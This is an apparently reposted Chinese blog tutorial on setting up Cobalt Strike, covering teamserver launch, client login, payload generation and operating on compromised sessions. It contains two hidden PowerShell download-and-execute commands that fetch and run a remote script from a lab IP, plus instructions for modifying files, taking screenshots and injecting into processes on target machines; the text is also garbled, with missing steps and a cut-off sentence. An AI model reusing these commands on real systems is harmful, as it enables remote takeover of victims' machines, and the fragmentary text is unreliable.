标签:工具 注入 生成 文件操作 alt ESS team 监听 cli
Cobalt Strike分为服务端和客户端两个部分从而实现分布式操作,协同作战。工具有linux和windows版本。
找到解压目录进入
./teamserver [IP] [password]
运行cobaltstrike,在host字段输入ip,user字段随便写,password,port是开启端口,默认50050。
? ./cobaltstrike
荷,并与监听器绑定。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘http://192.168.146.129:80/a‘))"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘http://192.168.146.129:801/a‘))"
?
可以对目标机器上文件进行删除增加修改。右键需要操作的session,进行文件操作,截屏,进程注入等。
标签:工具 注入 生成 文件操作 alt ESS team 监听 cli
原文地址:https://www.cnblogs.com/NBeveryday/p/cs_1.html